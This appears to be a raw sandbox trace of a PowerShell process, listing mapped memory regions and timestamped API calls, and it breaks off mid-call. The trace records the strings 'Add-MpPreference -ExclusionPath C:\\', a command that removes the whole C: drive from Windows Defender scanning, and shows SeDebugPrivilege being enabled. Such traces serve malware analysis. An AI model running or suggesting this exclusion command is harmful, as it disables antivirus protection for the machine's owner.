0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\SysWOW64\\winnlsres.dll" (normalized: "c:\\windows\\syswow64\\winnlsres.dll") Region: id = 3244 start_va = 0xac0000 end_va = 0xacffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winnlsres.dll.mui") Region: id = 3245 start_va = 0x75820000 end_va = 0x75825fff monitored = 0 entry_point = 0x75821460 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 3247 start_va = 0xc60000 end_va = 0xd5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 3276 start_va = 0x6d570000 end_va = 0x6d5b3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.numerics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Numerics\\4d1e79f86c195a48bfb3d1e5ca404930\\System.Numerics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.numerics\\4d1e79f86c195a48bfb3d1e5ca404930\\system.numerics.ni.dll") Region: id = 3277 start_va = 0xad0000 end_va = 0xadffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 3280 start_va = 0x6d4f0000 end_va = 0x6d569fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.management.infrastructure.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.Mf49f6405#\\c5cf09a01c434d73a149336798330955\\Microsoft.Management.Infrastructure.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.mf49f6405#\\c5cf09a01c434d73a149336798330955\\microsoft.management.infrastructure.ni.dll") Region: id = 3281 start_va = 0x6cdb0000 end_va = 0x6d4c5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\1f87b5140145c221b5201351fffc52d8\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\1f87b5140145c221b5201351fffc52d8\\system.xml.ni.dll") Region: id = 3283 start_va = 0xbe0000 end_va = 0xbeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 3284 start_va = 0x6cc90000 end_va = 0x6cdabfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.directoryservices.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Dired13b18a9#\\495b4726107659a7a7f716d2b34703ce\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.dired13b18a9#\\495b4726107659a7a7f716d2b34703ce\\system.directoryservices.ni.dll") Region: id = 3285 start_va = 0x6cb70000 end_va = 0x6cc8bfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\d2f554a0c84513cd793fdcd77a86dab1\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.management\\d2f554a0c84513cd793fdcd77a86dab1\\system.management.ni.dll") Region: id = 3288 start_va = 0xbf0000 end_va = 0xbfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 3290 start_va = 0xc00000 end_va = 0xc0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 3294 start_va = 0xc10000 end_va = 0xc1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 3296 start_va = 0xc20000 end_va = 0xc2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 3299 start_va = 0xc30000 end_va = 0xc3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c30000" filename = "" Region: id = 3309 start_va = 0xc40000 end_va = 0xc4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c40000" filename = "" Region: id = 3318 start_va = 0xd60000 end_va = 0xd6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 4772 start_va = 0xd70000 end_va = 0xd7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d70000" filename = "" Thread: id = 71 os_tid = 0x2d0 [0304.936] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0304.940] RoInitialize () returned 0x1 [0304.940] RoUninitialize () returned 0x0 [0305.450] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0305.450] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0307.434] SysStringByteLen (bstr="Add-MpPreference") returned 0x20 [0307.434] SysStringByteLen (bstr="Add-MpPreference") returned 0x20 [0307.434] SysStringByteLen (bstr="-ExclusionPath") returned 0x1c [0307.434] SysStringByteLen (bstr="-ExclusionPath") returned 0x1c [0307.434] SysStringByteLen (bstr="C:\\") returned 0x6 [0307.434] SysStringByteLen (bstr="C:\\") returned 0x6 [0308.444] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0xdec90*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0xdec90*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0308.446] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0xdec90*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0xdec90*(Data1=0x89fad99c, Data2=0x6dce, Data3=0x0, Data4=([0]=0x82, [1]=0xda, [2]=0xfa, [3]=0x89, [4]=0xce, [5]=0x6d, [6]=0xd8, [7]=0x1))) returned 0x0 [0308.447] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0xdec40*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0xdec40*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0308.450] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0xdeca0*(Data1=0x89fad99c, Data2=0x6dce, Data3=0x0, Data4=([0]=0x82, [1]=0xda, [2]=0xfa, [3]=0x89, [4]=0xce, [5]=0x6d, [6]=0xd8, [7]=0x1)) | out: ActivityId=0xdeca0*(Data1=0x89fad99c, Data2=0x6dce, Data3=0x0, Data4=([0]=0x82, [1]=0xda, [2]=0xfa, [3]=0x89, [4]=0xce, [5]=0x6d, [6]=0xd8, [7]=0x1))) returned 0x0 [0308.455] EtwEventRegister (in: ProviderId=0x62a40ec, EnableCallback=0xc52766, CallbackContext=0x0, RegHandle=0x62a40c4 | out: RegHandle=0x62a40c4) returned 0x0 [0308.530] EtwEventRegister (in: ProviderId=0x62a4dc0, EnableCallback=0xc5278e, CallbackContext=0x0, RegHandle=0x62a4d9c | out: RegHandle=0x62a4d9c) returned 0x0 [0308.546] EtwEventSetInformation (RegHandle=0x7c2ff8, InformationClass=0x23, EventInformation=0x2, InformationLength=0x62a4cf8) returned 0x0 [0308.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0xdd73c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0308.567] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xddbd0) returned 1 [0308.570] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.config" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe.config"), fInfoLevelId=0x0, lpFileInformation=0xddc4c | out: lpFileInformation=0xddc4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0308.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xddbcc) returned 1 [0311.419] EtwEventWriteTransfer (RegHandle=0x7c42a8, EventDescriptor=0x22, ActivityId=0xdecc8, RelatedActivityId=0xdec60, UserDataCount=0x0, UserData=0x0) returned 0x0 [0311.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xde6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87 [0311.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xde704, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87 [0311.427] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xdeb64) returned 1 [0311.427] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xdebe0 | out: lpFileInformation=0xdebe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2c94e9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2c94e9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2ef73f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6d2a00)) returned 1 [0311.427] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xdeb60) returned 1 [0311.428] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xdec54 | out: lpdwHandle=0xdec54) returned 0x93c [0311.430] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x93c, lpData=0x62a8f5c | out: lpData=0x62a8f5c) returned 1 [0311.432] VerQueryValueW (in: pBlock=0x62a8f5c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdec28, puLen=0xdec24 | out: lplpBuffer=0xdec28*=0x62a8ff8, puLen=0xdec24) returned 1 [0311.435] VerQueryValueW (in: pBlock=0x62a8f5c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xdeba8, puLen=0xdeba4 | out: lplpBuffer=0xdeba8*=0x62a90d4, puLen=0xdeba4) returned 1 [0311.436] VerQueryValueW (in: pBlock=0x62a8f5c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xdeba8, puLen=0xdeba4 | out: lplpBuffer=0xdeba8*=0x62a9128, puLen=0xdeba4) returned 1 [0311.436] VerQueryValueW (in: pBlock=0x62a8f5c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xdeba8, puLen=0xdeba4 | out: lplpBuffer=0xdeba8*=0x62a9184, puLen=0xdeba4) returned 1 [0311.436] VerQueryValueW (in: pBlock=0x62a8f5c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xdeba8, puLen=0xdeba4 | out: lplpBuffer=0xdeba8*=0x62a91c0, puLen=0xdeba4) returned 1 [0311.436] VerQueryValueW (in: pBlock=0x62a8f5c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xdeba8, puLen=0xdeba4 | out: lplpBuffer=0xdeba8*=0x62a9228, puLen=0xdeba4) returned 1 [0311.436] VerQueryValueW (in: pBlock=0x62a8f5c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xdeba8, puLen=0xdeba4 | out: lplpBuffer=0xdeba8*=0x62a92c4, puLen=0xdeba4) returned 1 [0311.436] VerQueryValueW (in: pBlock=0x62a8f5c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xdeba8, puLen=0xdeba4 | out: lplpBuffer=0xdeba8*=0x62a9328, puLen=0xdeba4) returned 1 [0311.436] VerQueryValueW (in: pBlock=0x62a8f5c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xdeba8, puLen=0xdeba4 | out: lplpBuffer=0xdeba8*=0x62a93a4, puLen=0xdeba4) returned 1 [0311.436] VerQueryValueW (in: pBlock=0x62a8f5c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xdeba8, puLen=0xdeba4 | out: lplpBuffer=0xdeba8*=0x62a9050, puLen=0xdeba4) returned 1 [0311.436] VerQueryValueW (in: pBlock=0x62a8f5c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xdeba8, puLen=0xdeba4 | out: lplpBuffer=0xdeba8*=0x0, puLen=0xdeba4) returned 0 [0311.436] VerQueryValueW (in: pBlock=0x62a8f5c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xdeba8, puLen=0xdeba4 | out: lplpBuffer=0xdeba8*=0x0, puLen=0xdeba4) returned 0 [0311.436] VerQueryValueW (in: pBlock=0x62a8f5c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xdeba8, puLen=0xdeba4 | out: lplpBuffer=0xdeba8*=0x0, puLen=0xdeba4) returned 0 [0311.436] VerQueryValueW (in: pBlock=0x62a8f5c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xdeb9c, puLen=0xdeb98 | out: lplpBuffer=0xdeb9c*=0x62a8ff8, puLen=0xdeb98) returned 1 [0311.437] VerLanguageNameW (in: wLang=0x0, szLang=0xde92c, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0311.446] VerQueryValueW (in: pBlock=0x62a8f5c, lpSubBlock="\\", lplpBuffer=0xdebac, puLen=0xdeba8 | out: lplpBuffer=0xdebac*=0x62a8f84, puLen=0xdeba8) returned 1 [0311.447] GetCurrentProcessId () returned 0x27c [0311.454] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xde47c | out: lpLuid=0xde47c*(LowPart=0x14, HighPart=0)) returned 1 [0311.455] GetCurrentProcess () returned 0xffffffff [0311.455] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0xde478 | out: TokenHandle=0xde478*=0x28c) returned 1 [0311.456] AdjustTokenPrivileges (in: TokenHandle=0x28c, DisableAllPrivileges=0, NewState=0x62ab450*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0311.456] CloseHandle (hObject=0x28c) returned 1 [0311.457] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x27c) returned 0x28c [0311.466] EnumProcessModules (in: hProcess=0x28c, lphModule=0x62ab494, cb=0x100, lpcbNeeded=0xdebdc | out: lphModule=0x62ab494, lpcbNeeded=0xdebdc) returned 1 [0311.470] GetModuleInformation (in: hProcess=0x28c, hModule=0xe20000, lpmodinfo=0x62ab5d4, cb=0xc | out: lpmodinfo=0x62ab5d4*(lpBaseOfDll=0xe20000, SizeOfImage=0x71000, EntryPoint=0xe29c00)) returned 1 [0311.471] CoTaskMemAlloc (cb=0x804) returned 0x7c80e8 [0311.471] GetModuleBaseNameW (in: hProcess=0x28c, hModule=0xe20000, lpBaseName=0x7c80e8, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0311.471] CoTaskMemFree (pv=0x7c80e8) [0311.472] CoTaskMemAlloc (cb=0x804) returned 0x7c80e8 [0311.472] GetModuleFileNameExW (in: hProcess=0x28c, hModule=0xe20000, lpFilename=0x7c80e8, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0311.472] CoTaskMemFree (pv=0x7c80e8) [0311.472] CloseHandle (hObject=0x28c) returned 1 [0311.473] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x27c) returned 0x28c [0311.473] GetExitCodeProcess (in: hProcess=0x28c, lpExitCode=0x62aab9c | out: lpExitCode=0x62aab9c*=0x103) returned 1 [0311.477] EnumWindows (lpEnumFunc=0xc527b6, lParam=0x0) returned 1 [0311.478] GetWindowThreadProcessId (in: hWnd=0x1014c, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x944 [0311.478] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x8f4 [0311.478] GetWindowThreadProcessId (in: hWnd=0x100e0, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0311.478] GetWindowThreadProcessId (in: hWnd=0x100ba, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0311.479] GetWindowThreadProcessId (in: hWnd=0x100be, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0311.479] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0311.479] GetWindowThreadProcessId (in: hWnd=0x100d4, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0311.479] GetWindowThreadProcessId (in: hWnd=0x100d8, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0311.479] GetWindowThreadProcessId (in: hWnd=0x100a0, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0311.479] GetWindowThreadProcessId (in: hWnd=0x100ae, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0311.479] GetWindowThreadProcessId (in: hWnd=0x100d2, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0311.480] GetWindowThreadProcessId (in: hWnd=0x10094, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0311.480] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x4ec [0311.480] GetWindowThreadProcessId (in: hWnd=0x100ec, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x7d0 [0311.480] GetWindowThreadProcessId (in: hWnd=0x100e2, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0311.480] GetWindowThreadProcessId (in: hWnd=0x20128, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x2d0 [0311.481] GetWindow (hWnd=0x20128, uCmd=0x4) returned 0x0 [0311.481] IsWindowVisible (hWnd=0x20128) returned 0 [0311.481] GetWindowThreadProcessId (in: hWnd=0x501b0, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0xfb4 [0311.481] GetWindowThreadProcessId (in: hWnd=0x101dc, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x4ec [0311.481] GetWindowThreadProcessId (in: hWnd=0x101da, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x554 [0311.481] GetWindowThreadProcessId (in: hWnd=0x101d6, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x554 [0311.481] GetWindowThreadProcessId (in: hWnd=0x101c6, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x4ec [0311.482] GetWindowThreadProcessId (in: hWnd=0x101c0, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0311.482] GetWindowThreadProcessId (in: hWnd=0x20072, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x744 [0311.482] GetWindowThreadProcessId (in: hWnd=0x20076, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x744 [0311.482] GetWindowThreadProcessId (in: hWnd=0x40070, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0311.482] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x998 [0311.482] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x8f4 [0311.483] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x8f4 [0311.483] GetWindowThreadProcessId (in: hWnd=0x30176, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x8f4 [0311.483] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x8f4 [0311.483] GetWindowThreadProcessId (in: hWnd=0x10136, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x8f4 [0311.483] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x8f4 [0311.483] GetWindowThreadProcessId (in: hWnd=0x1010e, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x8f4 [0311.483] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x8f4 [0311.484] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x8f4 [0311.484] GetWindowThreadProcessId (in: hWnd=0x10100, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x7d0 [0311.484] GetWindowThreadProcessId (in: hWnd=0x100f8, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x7d0 [0311.484] GetWindowThreadProcessId (in: hWnd=0x200f0, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x884 [0311.484] GetWindowThreadProcessId (in: hWnd=0x100d6, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0311.484] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x554 [0311.484] GetWindowThreadProcessId (in: hWnd=0x20050, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x4ec [0311.485] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x4ec [0311.485] GetWindowThreadProcessId (in: hWnd=0x100c2, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0311.485] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x7d0 [0311.485] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x7d0 [0311.485] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x48c [0311.485] GetWindowThreadProcessId (in: hWnd=0x1001c, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x324 [0311.485] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x8c4 [0311.486] GetWindowThreadProcessId (in: hWnd=0x100e6, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x7d0 [0311.486] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x944 [0311.486] GetWindowThreadProcessId (in: hWnd=0x100e4, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0311.486] GetWindowThreadProcessId (in: hWnd=0x10096, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x85c [0311.486] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0xd30 [0311.486] GetWindowThreadProcessId (in: hWnd=0x4004c, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0xfd4 [0311.486] GetWindowThreadProcessId (in: hWnd=0x101d8, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x554 [0311.487] GetWindowThreadProcessId (in: hWnd=0x101c8, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x4ec [0311.487] GetWindowThreadProcessId (in: hWnd=0x20074, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x744 [0311.487] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x998 [0311.487] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x8f4 [0311.487] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x7d0 [0311.487] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x884 [0311.487] GetWindowThreadProcessId (in: hWnd=0x10086, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x7d0 [0311.487] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xdeb54 | out: lpdwProcessId=0xdeb54) returned 0x48c [0311.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x72a94b0, Length=0x20000, ResultLength=0xdec14 | out: SystemInformation=0x72a94b0, ResultLength=0xdec14*=0xf378) returned 0x0 [0311.521] WerSetFlags () returned 0x0 [0311.523] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0311.524] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xdec30, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xdec2c | out: pulNumLanguages=0xdec30, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xdec2c) returned 1 [0311.524] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xdec30, pwszLanguagesBuffer=0x62c74d8, pcchLanguagesBuffer=0xdec2c | out: pulNumLanguages=0xdec30, pwszLanguagesBuffer=0x62c74d8, pcchLanguagesBuffer=0xdec2c) returned 1 [0311.531] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd6e8 | out: phkResult=0xdd6e8*=0x0) returned 0x2 [0311.535] GetUserDefaultLocaleName (in: lpLocaleName=0xdebc0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0311.550] GetEnvironmentVariableW (in: lpName="MshEnableTrace", 